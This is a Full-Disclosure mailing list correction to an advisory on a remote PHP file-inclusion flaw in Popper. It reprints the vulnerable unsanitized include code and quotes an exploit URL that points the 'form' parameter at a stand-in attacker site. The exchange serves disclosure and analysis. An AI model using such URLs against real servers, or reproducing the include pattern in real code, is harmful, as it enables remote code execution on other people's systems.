[Full-disclosure] Re: LSS.hr false positives. (correction)

[Leon Juranic <ljuranic@xxxxxx>]

Hi b0iler,


There is a problem with original advisory on security.lss.hr site.  Vulnerable 
PHP line itself is presented as HTML tag so it isn't visible within browser. 
That's why the rest of the advisory doesn't make any sense.

Here it is:
--------------
..
<?php
                if(file_exists($form.".toolbar.inc.php")) {
                        include($form.".toolbar.inc.php");
                }
?>
..
..
<?php include($form.".form.inc.php");?>    <- HERE IT IS
..
--------------


I apologize for that mistake, we will fix that in a few hours. 



> b0iler[at]r00thell.org:
>
>>Popper is vulnerable to remote code inclusion bug in childwindow.inc.php 
>>script that can be
>>abused to execute arbitrary code.
>>Vulnerable code in childwindow.inc.php:
>>
>>-----
>>...
>>    if(file_exists($form.".toolbar.inc.php")) {
>>        include($form.".toolbar.inc.php");
>>    }
>>?>
>
>file_exists() only work on local files, not even with allow_url_fopen on does 
>it work.  Even
>if the file_exists() check was not there your discription of how to exploit it 
>is incorrect:
>
>>To exploit this vulnerability, attacker has to put script like 
>>test.form.inc.php on
>>www.evilsite.com HTTP server, and call url like this:
>>http://www.vulnsite.com/popper/childwindow.inc.php?form=http://evilsite.com/test
>
>they would need to have the file test.toolbar.inc.php, not test.form.inc.php.  
>It's quite
>obvious you did not even bother testing this before issuing the advisory.
>


Regards,
---------------------------------------
Leon Juranic, LSS Security 
http://security.lss.hr 

"Born under the lucky star magical, 
but on this world generally tragical". 
                                - Djole 



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/